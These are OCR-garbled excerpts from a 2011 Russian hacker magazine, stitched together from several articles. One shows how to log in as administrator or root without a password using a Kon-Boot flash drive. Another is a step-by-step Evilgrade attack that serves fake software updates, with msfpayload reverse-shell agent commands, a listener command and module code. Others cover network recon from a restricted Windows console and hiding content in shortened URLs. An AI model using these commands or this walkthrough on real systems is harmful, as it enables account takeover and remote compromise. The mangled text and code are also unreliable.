чуда принял твои правки, не нужно долго на ломаном английском 
объяснять, что ты сделал конфетку из его непонятного кода. Просто 
отправь ему специальную заявку [пулл-реквест}, и если все хорошо, 
твой код быстро попадает в основную ветку. СИВиВ стал настоящим 
прорывом, потому что собрал в очень удобном веб-интерфейсе все, 
что надо матерому гику-программисту. И что еще важно — он до- 
бавил острое блюдо социальщины. 

Теперь не нужны все эти твиттеры и фейсбуки: для многих разработ- 
чиков (прежде всего Орепзоигсе) СКВиВ стал местом жизни, обще- 
ния и тут же, не отходя от кассы, кодинга. А все потому, что выстраи- 
вая среду для совместной разработки кода, СИВиБ не прячетлюдей 
за всеми этими коммитами и чекаутами, а активно их выталкивает 
на поверхность. Согласись, очень приятно видеть свою аватарку 
или фотку возле каждого принятого патча в важный проект. Не могу 
не упомянуть и про новые среды разработки, реализованные в 
браузере. Например, систему Сючд9 [с9.10], которая изящно допол- 
няет СИНоЬ и позволяет реально вести разработку с любого места, 
где есть интернет. 


Тренд 7. Мобильные платформы 


Последний тренд в нашем материале диктует само время. Веб- 
сервисы все чаще используются с мобильных устройств. Порта- 
тивные девайсы методично захватывают мир, поделив его между 
«яблочниками» и «роботами». А вотдизайнерам и разработчикам 
приходится поддерживать оба лагеря. 

К счастью, сегодня почти все топовые /}5-фреймворки имеют 
мобильные версии [часто совместимые по АР! с обычными вариа- 
циями)}, что позволяет просто заменой файла подогнать сайт под 
требования мобилок. Самым ожидаемым является |Фцегу Мобце 
(сейчас доступна только а[рВа-версия}, который по заявлениям 
будет работать на всех мыслимых и немыслимых платформах, 
включая экзотику для нас, типа В(асКБеггу, \/пЧом/$ РВопе, меб О5, 
бада и другие. Будучи расширением, а по большому счету, очень 
крутым плагином для |@чегу, он стандартизирует АР! для различ- 
ных устройств и их браузеров. К слову, в мобильном мире браузеры 
— это вообще один большой кошмар, так что браузерные войны 

на десктопах это только цветочки. Помимо этого разработчикам 
предлагаются строгие правила по созданию интерфейсов, чтобы 
веб-приложения имели понятный стандартизированный набор эле- 
ментов интерфейса, а пользователь не искал на своем маленьком 
экране полминуты кнопки «назад» или «отмена». == 
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КОЛОНКА РЕДАКТОРА 


Про вход в систему без пароля 


© Пе перестаю удивляться, какой в сущности бутафорией являются механизмы 
аутентификации пользователя в локальной системе. Войти в 00 с максималь- 
ными привилегиями без знания пароля? Плевое дело, когда под рукой есть 
флешка/С0 с нужным софтом. 


Это касается самых разных ОС. Есть даже 
универсальный инструмент — Коп-Бос\, 
который загружается с дискеты или СО 

и модифицирует память таким образом, 
чтобы без проблем залогиниться под 
администратором в \\Ипдо\з (включая 
«семерку» с сервиспаком] и под гооГом во 
многих [ипих-системах. Можешь легко убе- 
диться в этом сам (естественно, на своем 
собственном компьютере и только в целях 
восстановления забытого пароля). Правда, 
на сайте разработчика по какой-то при- 
чине нет образа для записи на флешку, а 
загружаться с СО (и, тем более, с дискеты] 
уже как-то несерьезно. Можно со знани- 
ем дела создать загрузочную флешку из 
СО-образа (благо мы уже столько раз это 
делали для разных Мпих-дистрибутивов)}, 
но с этим возникнут проблемы. Как сделать 
так, чтобы все заработало? Достаточно 
знать несколько нюансов. 

1. Сначала устанавливаем последнюю 
версию утилиты УМеФоойт ([ипе{БооНп. 
воигсеюгае.пе!) — пожалуй, лучшего реше- 
ния для создания загрузочных флешек. 

2. Далее необходимо скачать подходящую 
версию Коп-Боо{. Кажется, что сойдет 
СО-образ (как для многих других систем), 
но это неправильный выбор! Не наступай 
на грабли, от которых уже досталось мно- 
гим другим. Все заработает только в том 
случае, если на флешку будет загружен 
образ для дискеты. Поэтому с сайта проек- 
та (млм. рюгБап!а.сопп/аЦ/Коп-Боо\} загру- 
жаем вариацию «Е орру итаде». 

3. В конце концов заливаем образ на 
флешку с помощью ЧМеБоойп, выбрав в 
качестве типа образа «Г орру». 

4. Если теперь загрузиться с этой флеш- 
ки, то ты непременно увидишь загрузчик 
ОМаеБоойп. Жми <Ещег>, и на экране 
появится экран с надписью «Кгурфо [о91с». 
Или не появится :}. В последнем случае 
— на флешку нужно закинуть отредакти- 
рованный файл зузИпх.сЁа (БИ.у/так78В]. 
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Это решит проблему, но несколько услож- 
нит процесс загрузки. Теперь, после 
появления первого экрана зузИпих, необ- 
ходимо будет выбрать «1$ Коп-Восф», а 
после второго — «2па {гу Боо{ гот агме 
С: аз Ва1». Если экран «Кгур{о [од!с» так 
и не появится, то выбираем следующий 
вариант — «.. П92» и т.д. В конце концов, 
все должно получиться. 

5. После экрана «Кгур{о [091с» начнется 
загрузка ОС, которая установлена на 
компьютере. Только в отличие от обыч- 
ной загрузки, ты сможешь беспрепят- 
ственно залогиниться в системе с макси- 
мальными привилегиями: 

® для входа в систему Шпих используй 
логин Коп-чи$г: 


Обипти 8.04 фогреда 1%у1 
фогреда 1051п: Коп-и$г 
# 14а 

и14=0 (гоо{) #14=0 (гоо*) 
# ипоат1 

ГООТ 


® для входа в \\Ипдо\м/5 подойдет учетная 
запись любого существующего пользо- 
вателя в системе, поля пароля при этом 
можно оставить пустым. 

Проект Коп-Воо{ начинался как прототип 
хака, который на лету вносил изменения 
в ядро Шпих и позволял таким образом 
зайти в систему под гооГом. Сначала 
появилась версия для ЧБип\(и, а после 
вышли плагины для многих других Ипих- 
дистрибутивов. С недавнего времени 
Коп-Воо{ поддерживает еще и большин- 
ство \\ИпЧо\/5-систем. Примечательно, 
что проект написан на чистом ассембле- 
ре [ТАЗМ 4.0] и работает только на архи- 
тектуре Х86-32. Дальнейшее развитие 
Коп-Воо{ разработчик видит в виде ком- 
мерческого продукта, который уже досту- 
пен с сайта м/м. Кгуро$[оа1с.сот и стоит 
денег, но зато имеет несколько полезных 
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Заливаем на флешку образ Коп- 
Вос} 


Входим в систему под админом без 
пароля 


доработок, в том числе возможность 
использования с любыми 32/64-битными 
ММ пдом/5-системами. == 
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Опасные обновления 


заражение системы через механизм 


дапдеитов 


© Любое современное приложение периодически запрашивает на 
сервере информацию о новых обновлениях. Это очень удобно: один 
клик мыши — ив системе уже установлен самый последний релиз 
программы. Но! Обрадовавшись появлению обновленной версии и 
согласившись на установку апдейта, пользователь может получить 
не свежие багфиксы и новые функции, а боевую нагрузку. 


Вспомни, как обычно выглядит система автоматического обнов- 
ления какого-то привычного приложения. Программа в какой-то 
момент выдает сообщение вида: «Доступна новая версия. Пожа- 
луйста, обновитесь», и мы чаще всего сразу же даем отмашку на 
установку свежего апдейта. 

Но задумывался литы, что там скачивает 5Куре или /ауа? Едвали. 
Запуская процесс обновления, последнее, чего можно ожидать, 
— это какой-либо подставы. Как не парадоксально, но этот самый 
механизм доставки обновлений может стать уязвимым местом всей 
системы. Причем речь идет не о каких-то левых поделках горе- 
программистов, ао серьезных продуктах с миллионной армией 
пользователей. 
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Где изъян? 


Атаки через системы обновлений приложений известны давно. Все 
дело втом, что разработчики не сильно утруждаютсебя задуматься о 
безопасности механизма доставки обновлений. Чаще всего процесс 
автоматического апдейта выглядит следующим небезопасным образом: 
® приложение инициирует процесс обновления (автоматически или 
по команде пользователя]; 

® через ОМ5 запрашивается хоста с обновлениями (например, 
ирда\е.арр1.сопп); 

® О№5-сервер возвращает адрес сервера (например, 192.168.1.1}; 

® приложение загружает с сервера специальный файл с информа- 
цией об апдейтах (например, ([аз{ирда(е.хп, анализируетего и 


ХАКЕР 07 /150/ 2011 


Загрузка Емйдгаде 


определяет, что доступна новая версия; 
» вконце концов, приложение скачивает файл 
ВЕр://ирда{е.арр1.соп/ирдаке.ехе и выполняетего. 

Воти все. Никакихтебе проверок подлинности серве- 

ра обновлений, сверки цифровой подписи скачанного 
файла и других элементарных действий, которые могли 

бы обезопасить процесс обновления. Слепое доверие — 
по-другому не назовешь. Получается, что ничто не мешает 
злоумышленнику притвориться сервером обновлений и 
отправить приложению файл, который оно запустит. Полу- 
чаем классическую МП М-атаку, позволяющую инжекти- 
ровать нагрузку через систему обновлений, которая реали- 
зуется спомощью АКР-спуфинга либо путем «отравления» 
ОМ№5-кэша. Если ты думаешь, что это проблемалишь 
отдельных приложений, то сильно ошибаешься. Иссле- 
дователь Франциско Амато из команды |птоБ\е 5есигйу 
РезеагсН (млм поБ\езес.согп/Чеуеоргпеги$.В{и70 
разработал на Рег| модульный фреймворк специально для 
реализации атак через систему апдейтов. Инструментна- 
зывается Е\уЦагаде и включает в себя готовые модули для 
эксплуатации нехилого списка известных приложений: 


» Теату1емег 5.1.9385; 

» №0оТерад++ 5.8.2; 

‚ ]ауа 1.6.0_22 им1пхр/м1п7; 

» Арр1еирдате <= 2.1.1.116 ( 5афаг1 5.0.2 
7533.18.5, <= Ципез 190.0.1.22, <= Ои1тскЕ1те 7.6.8 
1675}, 

» \1п00м$ ирдафе (1еб 1аз\уег$1оп, 1е7 

7.0.5730.13, 1е8 8.0.60001.18702, М1сго$о++ могК$); 
» И1патр 5.581; 

е УтрЕна1Вох (3.2.8); 

» [11е7111а; 

» Е] азИбет; 

» М1гапаа; 

. Куре; 

° 11 тай <= 5.0.0.26: 

» АЧТит 1.3.10 (5рагК1е ЕгатемогК); 

» \/Ммаге; 

тел. 


Каждый модуль отвечает за эмуляцию обновления кон- 


кретного приложения. Помимо этого в ЕуЦагаае входят 
модули, реализующие \М/еБ- и ОМ$-серверы, которые 
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Настройка модуля зитщауа 


ЕмЙдгааде + Меазрой 


Во время конфигурации модулей Е\Цдгаде важным шагом является уста- 
новка параметра адепт, с помощью которого определяется полезная нагруз- 
ка (рау1оа9). По сути, это тот файл или команда, которые будут отправлены 
клиенту под видом обновления. Однако, попробовав поменять значение 
адеп(, ты обнаружишь, что в Е\Цдгаде не так уж много доступных агентов 
(они, кстати, находятся в папке адеп{. Спешу тебя успокоить, разработчики 
ЕуЦагаде продумали этот момент и добавили возможность использования 
различных рауоа4`ов из Меа$зр1ок. На практике это выглядит так: 


> зе авепЕ ' [ "/тефазр1о1/тзФрау1оа@а м1п4ом$ / $Не11_гемуег5е ср 
ЕНО$Т=192.168.1.2 ЕРОКТ=4141 Х > <%01Т%>/+тр/а.ехе<#0уТт%>" | ' 


Если задать агент данным образом, то при каждом запросе файла обновле- 
ния будет генерироваться бинарник с полезной нагрузкой млпаом/5/зВеЦ_ 
геуегзе ср, который будет пытаться подключиться к 4141 порту компьютера 
192.168.1.2. Специальный тег <%ОЧТ%> указывает, куда будет помещен 
сгенерированный файл [в данном примере это папка /\гпр, а имя файла 
будет а.ехе). То же самое, в принципе, можно проделать и другим способом: 
зайти в М&азр[ок, сгенерировать файл, переместить его в какую либо папку 
и установить этот файл в качестве агента в Ем(9гаде. Но в этом случае это 
будет уже не динамический метод. 


облегчают проведение атаки. Последняя версия была 
представлена относительно недавно на конференциях 
В аскра+ Агзепа! & Ое!соп 2010. 


[ МАВММб _ 
Азы Еуйагаде 


Поскольку фреймворк написан на Рег(, то запустить его 
можно налюбой платформе. Я юзал его под виндой, и 
для правильной работы с АсНуе Рег! (млм. аспуее(е. 
сого/асНуерег мне потребовалось установить два 
пакета: 10 ::;5осКе{::55ЁЕ и Ме: :55Ёеау. В стандартных 
репозиториях их не оказалось, поэтому я установил ихс 
помощью пакетного менеджера ррт с альтернативных 
источников. Делает это так: 


› магпта 
Информация пред- 
ставлена в ознако- 
мительных целях. За 
ее использование с 
нарушением закона 
автор и редакция от- 
ветственности не 
несут. 


ррт 1п$%а11 ПЕЁр: / /ммм. $15урПи$1оп.ЕК/ррм/Мет- 
55Ееау.рра 

ррт 1п$а11 Пр: / /ммм. $15урпиз1оп.ЕК/ррм/ТО- 
5оскеф-5$5Е.рра 


После этого ЕуЦагаде будет запускаться и работать без 
сучка и задоринки. Если ты уже использовал Метазр[о(, 
то долго разбираться с Е\Цагаде не потребуется: син- 
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Процесс общения приложения с сервером обновлений 


таксис команд во многом очень похож, а взаимодействие осущест- 


вляется так же через интерактивную консоль. Можно запустить при- 


ложение и набрать Вер, чтобы получить список доступных команд: 


сопйвиге <‹имя модуля> — выбирает текущий модуль и позволяет 
настроить его параметры; 
ге1оа4 — перезагружает список доступных модулей; 
ге$Фаг{ — перезапускает Меб- и О№5-серверы; 
$е{ — устанавливает значение заданной переменной; 
$Ном — показывает информацию об объекте. Список доступных 
объектов: 
ор1оп$ — псписок опций текущего модуля; 
упо$+$ — псписок виртуальных хостов текущего модуля; 
тои1е$ — псписок всех доступных модулей; 
асЕ1\уе — пактивные модули; 
$фаг{ — пзапускает МеБ- и О№5-серверы; 
$фафи$ — потображает статус Меб-сервера; 
$фор — постанавливает ШеБ- и О№-серверы; 


Понимаю, что от этого списка понятнее ничего не становится. Не 
волнуйся. Дальше по ходу примера все станетясно. Какя уже сказал, 
среди продуктов, подверженных данному виду атак, есть достаточно 
популярные решения. Возьмем, например, /ауа, которая требует- 

ся для работы многих программ и довольно часто встречается на 
компьютерах пользователей, и попытаемся сее помощью получить 
доступ кудаленному хосту. Думаю, это будет хороший пример. 


Тестовая лаборатория 


Итак, у нас есть два компьютера: один из них, с установленной 
]ауа, выступает в роли жертвы, другой (с Е\Цдга4е) — в роли 
атакующего. Какты помнишь, для успешного проведения атаки 
необходимо, чтобы при обращении к серверу обновлений, прило- 


жение «попадало» на компьютер атакующего, что обычно делается 


при помощи АКР-5роойЙпад а или ОМ5 Саспе Ро!зоп. Мы немного 
упростим себе задачу [чтобы в десятый раз не писать об одном и 
том же] и просто отредактируем файл [о${5 на машине жертвы, 
указав в нем в качестве адреса сервера обновлений адрес нашей 
атакующей машины: 


192 168 12 
192. 1659 12 


]ауа. зип. сот 
] ауаа1-е54. зип. сот 


Теперь в ход идет Еу(дгаде. Запускаем его: 


рег1 е\у115гаде 


Чтобы посмотреть список доступных модулей, вводим «$По\м/ 
тойц(ез». Список достаточно внушительный, есть из чего выбрать, 
но нам нужен модуль 5ип\ауа. Далее, чтобы сконфигурировать его, 
вызываем соответствующую команду: 


> соп+ зип]ауа 
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Посмотрим, какие Параметры мы можем поменять: 


> °Пом ор10п$ 


После чего получаем следующую таблицу: 


Мате = 5$ип М1тсгозу${ет$ Зауа 
\Мег$1оп = 1.0 


Аифвог = ["Ргапс1$со Атафо < Фатафо +[АТ]+ 1птоБу%езес.сот>" ] 


Резсг1треТоп = "" 

\1гЕиа1Но$* = "(Зауа.зип.сот|3ауа91-е$а.5зип.сот)" 

| Маме | рефаи1 

| меб$1%е | Пр: //]ама. сот/тоге1по11пК 

| епаб1е |1 

| ае1Е1е | Сг1%1са1 уи1пегаб111*у 

| аге | ЕЕр://)ама. зип. сом/х.)п1р" 

| адезс | 101$ сг11са1 ирда*е #х 1п%егпа1 уи1пегаб111%у 
| дезсг | 161$ сг11са1 ирда*е #х 1п%егпа1 уи1пегаб111%у 
| авеп* | ./1пс1иде/зипдауа/ЗауаРау1оад/ЕиппуС1а$$2.3аг 
| Е161е | Сг1Е1са1 ирда*е 


Наиболее интересное для нас поле — это адег\, представляющее из 
себя аналог полезной нагрузки (рауоа9] в Меазрок. Проще говоря, 
тутмы указываем файл, который будет отправлен жертве в качестве 
обновления. В данном случае — это Еиппу((аз$2.\аг. Это геуегзезЙеЦ, 
который инициирует соединениес 2010 портом атакующей машины. 
Поэтому перед его использованием надо запустить приложение, кото- 
рое будетожидать попыток соединения на 2010 порт. Для этого зайдем 
в папку шс!иде\зипауа\УауаРауоай\ и выполним команду: 


]ауа -ср "ЗауаРау1оа4. )аг:116/*" 3ауарау1оад. Папа1ег. 
5Табег. $ФавегНапЧ91ег Кеуег5е$51 192.168.1.2 2010 -- 351 


Теперь можно вернуться к конфигурации модуля. Обрати внимание 
на поля а Це и адезсгирйоп. Тут задается сообщение, которое будет 
появляться в трее, как только /ауа соединится с нашим сервером 

и найдет свежие обновления, и после — в процессе выполнения 
обновления. Все параметры данного модуля можно изменить, 
используя команду $е{. Заменим, к примеру, заголовок информаци- 
онного окна: 


> зеф аЕ1{1е "Мем уег$1оп ауа11аб1е" 


Подобным образом можно менять и остальные параметры. Если 

теперьеще раз ввести команду «$По\м/ орНопз», то мы увидим из- 
менения в настройках модуля. По сути, сейчасуже можно смело 

запускать все необходимое для проведения атаки. Делается это 

командой $аг\. 
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Структура модуля ЕуЙдгаде 


Надо понимать, что Е\уЦдгаЧе — это все-таки фреймворк для 
реализации атаки через обновления. Встроенные модули для 
популярных приложений являются примерами того, как его 
можно использовать. И их не так уж и много. Хочу рассказать 
немного об их структуре, чтобы ты имел представление, как 
такой модуль можно собрать самому. Поскольку сам ЕуЦагаае 
написан на Рег(е, то любой модуль, по сути, представляет собой 
обычный Реп-скрипт, в котором мы: 

1. Задаем имя модуля и подключаем необходимые пакеты: 


а а бр пов Бе в п. К | [ зы | 


расКаде моди1ез : : 5ип]ама; 
и5е ${г1сЕ; 


СС 


изе Бажа: :Витр дм(ачтр); 


Вручную запрашиваем обновления и получаем 2. Определяем переменную ФБазе, включающую в себя все дан- 
информацию о наличии «нашего» критического 
апдейта 


 @ы 


ные о работе модуля: 

® имя модуля для отображения во фреймворке, версию модуля, 
версию уязвимого приложения, информацию об авторе моду- 
ля, краткое описание и список виртуальных хостов, с которых 
приложение пытается получить информацию об обновлении и 
файлы обновлений: 


о Тара рб и по Кр ве уе реа ас РР пс той ий 


орет КА Яя Песь роже — РА валерий ор ая Ив Ба. 
Са Бо от вся ол НЫ 

в |, - мы Ра т т 0 О т 
Ал ит сы [| паме' => '5ип М1сгозу$%етз Зауа', 
ОР ыы 


‘уегзтоп‘ => 2.9, 


Паже ротериитиющьдь ци [м ти. ее ПРО 5 ры РИ БДЕЕРН. 8 
И ЕЕ 
а р и 

РИ ее ай ее РА оо й Я м Вене БиьлЫ-Й 


'арруег’ => "<= 1.6.0_22', 

'аифПог' => [ "Мате $игпаме < та11 +[АТ]+ ма11.сот>' ], 
'дезсг1р1оп' => 949{}, 

'уП' => '(]ауа.зип. сом |] ауа91-е$9.5зип.сот)', 


® список запросов, которые будет посылать приложение нашему 

а и > > 

серверу обновлений с использованием регулярных выражений: 
'геад’ => '(/ирдафе/[.\4]+/тар\-[.\9]+.хи1 | / 
ирда*е/1.6.0/тар\-т\-1.6.0.хт1)', 


Подменяем адреса серверов обновлений 


® список опций, которые будут использоваться в ответах нашего 
сервера обновлений: 


Эксплуатация 


Теперь проверим, как это все работает. Чтобы инициировать про- 


цесс обновления на компьютере жертвы, заходим в панель управ- "орЕ1о0п$ "=> 


ления, запускаем /ауа, и в появившемся окне выбираем вкладку { 'аврепё' => { '\а1' => './авепе/Зауа/Зауамз.ехе', 


«Орда(е», нажимаем кнопку «Орда{е Мом/». Весь процесс «обще- 'аезс' => 'Авеп{ +о 1п3ес*'}, 
ния» приложения с сервером обновлений будет отображаться в 'аге' => | ‘ма! => "НЕЕ: //Зама. зип. стих. пр’, 
окне ЕуЦдгайе. Посмотреть текущее состояние можно с помощью 


команды «$По\м/ $а{и$»: 


'4езс' => 'Агё раз5е То Авеп*'}, 
'епаб]е" => { '\уа1' => 1, 'аезс' => '5фафи$'}, 


192. 168.1.1 
тоЧи1е$ : : зип) ауа 


Полностью разобранный файл модуля с комментариями на рус- 
ском языке ты можешь найти на 0\/0-приложении. 


с11епе 


тоац1е 
$Фафи$ = зепа 
(та5 , ста, Я1е) = а9а286аа883ес+51е411с626е144ееа5 ,’, 
".1пс1иае/зипдауа/ЗауаРау1оаа/ЕиппуС1а$$2.3аг" 
ход», которым кто-то может воспользоваться. Многие разработ- 
Онуказывает, что поддельное обновление было успешно отправле- чики успели исправить некоторые детские болезни, немного обе- 
зопасив процесс обновления. 


Увы, далеко не всегда это дает нужный эффект. Если поковы- 


но на машину с адресом 192.168.1.1. Теперь, открыв вторую консоль, 
ожидавшую подключения, убедимся, что боевая нагрузка успешно 

была выполнена — имы имеем геуегзе Ве кудаленному компью- ряться в исходниках модулей [о том, как они устроены, читай во 
теру. Можно ввести команду Пе[р и увидеть список команд, доступ- врезке), которые идут вместе с Еу(9га4де, несложно найти места, 


ных квыполнению на удаленной системе. 


Детские болезни 


Как видишь, даже серьезные приложения могут быть большой 


где происходит обход примитивных проверок. Но каким должно 
быть безопасное обновление? Автор Еу(9гаде говорит о том, что 
сервер обновлений должен работать под ПЦр$ и поддерживать 
сертификаты, а само обновление должно обязательно содержать 
проблемой для безопасности компьютера. И пусть в них нетпере- цифровую подпись, которую можно проверить по публичному 
полнений буфера или прочих ошибок, но неправильно реализо- ключу. 


ванный механизм обновлений превращает их в этакий «черный Вроде бы все просто, но проблема по-прежнему есть. == 


> 037 
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97% 


РКОСЕ-ОЕ-СОМСЕРТ 


Ргоо{-0{-Сопсер* (РОС) — наша новая рубрика, в которой 
мы будем рассказывать об интересных концептах, вы- 
ковыренных нами в самых разных уголках интернета. 
Если и тебе встретится что-нибудь интересное — смело 


присылай нам это по адресу рос@геа|(.хаКер.ги. 
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Исходный код страницы 


Прекрасную и очень оригинальную идею бесплатного 
анонимного хостинга предложил недавно автор блога 
гпа(ауа-хети(уа. Иуе]оигпа(. сот. Суть идеи очень проста 
— запихнуть весь контент странички в ПКЕ, а затем 
сократить с помощью любого сервиса сокращения 
ОКЕ’ов вроде БИ, доо.9[ или Ипуиг[ сот. Потребуется 
только разместить где-то элементарный скриптик, 
который будет из урла брать контент и выводить на 
экран. Хранить он при этом его не будет. Хранить весь 
контент будет сокращалка. В общем, красота. 

Давай поподробнее разберемся, как это работает. 
Итак, есть ссылка, например, Ипуиг.сого/Зпави?(. При 
переходе по ней — нас переправит на длиннющую 


[НТТР:// МММ 


› ЦпК5 
Соответствующий 


поставтора идеи со 
всеми необходимыми 


ссылками: ссылку вроде следующей: 
гла(ауа-хегтт(уа. 
(уе]оиугпа(. Пр: //хостинг/яваскрптик. И т1#Р6В1УМО+С] х79Н1 $ 


с0п1/639054. Вити 74КУтЭКе$В7С1А\У29$6316ТСМСВ-У7С1АвУтЕ) а2ауб3\и7 


› 038 


в _ 
ва 


Пример страницы, сохраненной на Япий 


С1)62хус]о=Т2АмМО$КЕОо8Е3№еих1Р=081211\У\0+С)х1Ь 
2К5Рё=рЦаб17ТНВА72\5ахХМваб97ас\/ктб9итохртепу7муЭ9т 
иИоанАбЕу9@ам559Х5 $ЕмМу6$Т+аб1иех\/убьс5620812Е+С 
ЭммУут9кет4= 


В ней все после знака '#’— это наш контент в Базе64- 
формате, а яваскриптик — это скрипт, делающий вот 
так: 


\аг И$И = аоситеп* .1оса*1оп.Па$й; 

П$Н = НИ .5и6$%г1п8(1, ИИ .1епёеИ); 
доситеп* .мг1*е (4есодеб4(Ип$п )); 

// десодеб4 — функция, декодирующая Базе64 


То есть он просто получит все, что после '#', раскодиру- 
ети выведет на экран. 

В БЕС длина ОБЕ никак не регламентирована, поэтому 
можно смело кодировать с помощью любого Базеб4- 
алгоритма Вигп(-код любой длины, надеясь, что браузе- 
ры тоже никак не ограничивают длину урла. Чтобы раз- 
местить таким образом картинки, нужно будет немного 
потрахаться с Дака. Вот так, например: 


<1тё 5гс="а*а : 1тае/ 1+; Базеб4 , К01бОо01ПЕААОДЕ 
МААОа7Тоени0т1$ /717\/03\6291/+3/ /УЬ//ве8 м Е+/ 
гиЕ/зкаби1тхЬР/ /те/ / /УН5ВААААААА! ААААААОДАЛААА 
ВезЕ1ЕкКуку67071И1 п] М5УУае ЕС: ЗоЕхКсрр\У@даСсбСтт 
ТНЕТОЕа] ва0ОВСМхТСбедСсвиимбаЕ  \/МККТг7=772КРЭ5Р 
2аТуа7$3Аз\бсоЕбу2х$Вха№УР) / >АмХЕОА7" имтаП="16" 
Бе1теН="14"/> 


Синтаксис тут простой (данные, понятно, в пресловутом 
Базеб4): 


Дажа: [<тип данных> ] [; Базеб4] ,‹данные> 


Как применять такую занятную идею, мы предлагаем 
тебе придумать самостоятельно, но, уверены, у всех 
случается необходимость что-то опубликовать, но... 
неу себя. Чтобы не прицепились, а то всякое бывает 


.). == 
.’" ыы 
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Я 


Ш № Длексей «СгеепО)од» Тюрин [адгггд4од@дтай. сот) 


ЗАДАЧА: ПРОСМОТРЕТЬ 
ЗАПУЩЕННЫЕ ПРОЦЕССЫ В_ 
МНОГОПОЛЬЗОВАТЕЛЬСКОИ СИСТЕМЕ. 


РЕШЕНИЕ: 


Такая задача может возникнуть, например, когда мы — обычный 
пользователь со стандартными правами натерминальном виндовом 
серваке и нам интересно, «чем заняты другие». Диспетчер задач (то, что 
запускается <с{г(+аЦ+4е| >} отображаеттолько процессы пользователя 
запустившего его. Для просмотра всех процессов — проситуже более 
высоких привилегий. 

Решение без использования сторонних программтипа Ргосез$ 
Ехр(огег’а от Русиновича есть. Имяему — Та$КИ<{. Это стандартная 
консольная тулза. Она выводит все запущенные в винде процессы, чем 
мыи можем воспользоваться. 

Кроме этого, у программы естьеще пара юзабельных аргументов, кото- 
рые могут пригодиться. 


Отображение служб для процессов: 
фа$К11$% /5\С 


ЗАДАЧА: НАЙТИ ЛЕГКУЮ АЛЬТЕРНАТИВУ 
СНИФФЕРАМ НА БАЗЕ МЛМРСАР. 


РЕШЕНИЕ: 


Хочу познакомитьтебя снедавней разработкой МЕТКЕЗЕС — небольшой 
Тулзой, позволяющей снифатьтрафик. Зовутее Кам/Сар (М^^/^^/. пе{гезес. 


согп/?раде=Вам/Сар). Обладая не слишком серьезной функциональ- 
ностью, онаявляется отличным выбором длятех, кто потем или иным 
причинам не может использовать библиотеку \МИпРСАР. Хоть возмож- 
ности ее иневелики — мониторингинтерфейса и дамп всего в файл, но 
следующие преимущества заставляюткней присмотреться: 


1) Весит она всего 17 Кб; 
2) Работает через стандартные гам зосКе®$ №1паом$ (о том как 
реализовать сниффер на базе этой технологии, читай в ста- 


тье «Скринсейвер-нюхач» — имм.хаКер.ги/тарРа21пте/ 
хА/077/112/1.а5р); 


3) Отсутствие установки; 
4) Возможность прослушивания почти любых интерфейсов, включая 
м1Е1-, 1оорбаск- и РРР-интерфейсы. 


Из минусов стоит отметить следующие вещи. Во-первых, По заявле- 


ЗАДАЧА: СБОР ИНФОРМАЦИИ, А ТАКЖЕ 
ПЕРЕБОР СТАНДАРТНЫМИ СРЕДСТВАМИ 
МЛМООМУ5. 


РЕШЕНИЕ: 


В продолжение предыдущей задачи давай посмотрим, чтоещемы 
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Список процессов через консоль 


Отображение процессов с подгруженными а11? ками: 
фа$К11$% /Р 


Ш-—--- — 


ышеа Шиш ы лета ГЕТЕ 


+ а с те а 

: 2 Що ЕЕЕНЕ С. 

‚ри Па Бат о И Бит вннванонннии, 
вал х _ М 


Ним БЕЯ м Е г 


: ЕЕ 


а ие о в т наи риы ры ш рии ри. Ро. в шт 
в ПИ МЕ МЫ мг Ш. Тв рва с Я 
БЕБРЫ ВНРЫЕ ФВ ие 

НЕ р ша. 


Снифим трафик. Камисар — мал да удал. 


нию разработчика — утилита не совсем корректно работает (пропу- 
скает пакеты} под \\Ипаом 7 (для входящих пакетов} и под Ма (для 
исходящих]. Во-вторых, необходимо присутствие .МЕТ Егагпе\ммогк 
версии 2.0. В-третьих, потребность в админских правах. 
Запускается тулза следующим образом: 


ВамСар.ехе номер_интерфейса имя_файла_дампа 


можем сотворить в консоли. Конечно, виндовая консоль — этото, счем 
приходится мириться, а нето, чем хочется пользоваться, потому что 
удобно. Впрочем, это лирика. Итак, ситуация примерно следующая. Мы 
имеем права обычного пользователя на какой-то тачке. Что мы с этим 
можем сделать? Особенно, если доступ есть только к консоли (т.е. шелл). 
Конечно, лучше всего было бы закачатьтого или иного софта и не му- 
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читься. Но, во-первых, могут бытьтрудности с закачкой файлов (когда 
поовнилась машина за фаерволом и прямого доступа нет), во-вторых, 
антивирусы могут задететктить, если закачаешь какую-то ересь. Окей. 
Так что же нам может предложить виндовая консоль и стандартные 
инструменты 7 Думаешь ничего? Как бы нитак. По сути, классический 
набор для сбора информации о сети, а кроме того — возможность про- 
ведения некоторых видоватак. 

Как раз об этом рассказывал Ед 5Коца!$ в вебкасте «Репехгайоп ТезИпод 
Мази». Запись и слайды можно скачать здесь млм. согезесигНу.сого/ 
сог(еп/меБса<{-зете$-ммй-зап$]. 


Я же приведу несколько примеров оттуда: 


С: \> Рог /Ё 1 1т (1,1,255) до @р1те 10.10.10.%1 —п 1 
| липа "Вер1у" 


Здесь Фог — команда начала цикла; 
/Е — указывает, что цикл — счетчик; 
%1 — имя переменной цикла; 
11 (1,1,255) — значения от1 до 255 сшагом 1; 
о @р1п5 — окончание цикла выполнением команды р!пд; 
10.10.10.%1 — |Р-адрес с подставленной переменной; 
—п 1 — количество пингов; 
| виа "Кер1у" — результата работы передаутся «|» на вход команде 
Нпа, которая ищет слово «Кер(ау». 
Каквидишь — все просто. Таким образом, мы находим живые хосты в 
диапазоне 10.10.10.1-255. 
Логику следующих примеров пояснять не буду, уверен, ты разберешься. 
Добавлю ещетолько пару пояснений: 
Соттапа1 & Соттап2 — запуск нескольких команд; 
Соттапа1 && Соттапа2 — запуск второй, только при успешном выпол- 
нении первой; 
> — запись в файл; 
>> — запись в конец файла; 
Рог /Е — цикл по файлу; 
Соттапа 2 > пи1 — стандартный вывод ошибок не отображается; 
Соттапа 2 >> еггог$.{х{ — ошибки в файле. 
Итак, определяем имена хостов: 


С:\> Фог /Ё #1 1т (1,1,255) до @п$1оокир 10.10.10.%1 2>пи1 


0 ЗАДАЧА: ПРОВЕРИТЬ МАЛВАРЬ НА 
= ДЕТЕКТИРУЕМОСТЬ БЕЗ СЕРВИСОВ 
ВРОДЕ МКОЗТОТА(. 
РЕШЕНИЕ: 


В мартовском номерея уже писал про эту задачу. Нам требовалось 
проверить малварь на обнаружаемость антивирусами, но не хотелось 
бы, чтобы дикие экземпляры попадали вантивирусные компании. В ка- 
честве замены были предложены альтернативные онлайн-сканеры. Но 
только на платных обещалось, что экземплярчики никуда неуплывут. 
То есть по факту — половина решения. 

Так вот, альтернативное решение. Недавно мне пришло письмо от 
